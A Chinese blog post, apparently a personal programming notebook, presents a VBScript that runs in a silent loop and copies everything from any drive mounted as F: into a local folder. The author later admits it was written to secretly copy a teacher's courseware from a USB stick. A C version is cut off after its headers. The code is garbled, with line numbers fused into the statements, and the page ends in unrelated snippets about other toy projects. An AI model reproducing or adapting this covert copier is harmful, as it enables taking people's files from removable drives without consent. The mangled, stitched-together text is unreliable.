寫著玩的小練習

2022-08-20 23:15:17 字數 728 閱讀 3703

(2023年2月20日註:這些**原先發在工作室的**上,時間是2023年9月9日)

1

set fso=createobject("

scripting.filesystemobject")

2set ws=createobject("

wscript.shell")

3onerror

resume

next4do

5 wscript.sleep 1000

6if fso.driveexists("

f:\") then

7 fso.copyfile "

f:\*

","e:\c++ project\

"8 fso.copyfolder "

f:\*

","e:\c++ project\

"9 wscript.sleep 20000

10end

if11

loop

1 #include 2 #include 3

4int

main()

(2023年2月20日註:當時說的寫著玩,其實是為了上課偷偷複製老師的課件才寫的,現在也能明顯的看到不管是上面的vb**還是下面的c**都是將老師插入的u盤啥的直接複製到後備目錄上,好像最後都是還不如直接複製來得快哈哈哈,好懷念那時候的日子!)

生成頭像 沒事寫著玩的

author seven yu e mail dofyyu at gmail.com version 0.0.3 update 2012 11 14 rand true cache true time rand time 0 name isset get name trim get name tim...

C 鍊錶 木有用,寫著玩

移除最後乙個的節點 使用二級指標更好 int removefromlast node firstlocation if head next null node current head while current next next null free current next current ne...

乙個寫著玩的 bitcoin 客戶端

看書確實是很好的學習位元幣的方法,但是沒有 的幫助,理解位元幣如何實現時,很是困難。因此,想去閱讀其 實現。在閱讀 bitcoin core 用 c 客戶端時,其環境和除錯對我來說實在麻煩,我看不太懂。後來發現乙個用 js 寫的完整 bitcoin 客戶端,就決定用它來研究位元幣原始碼了,幫助我理解...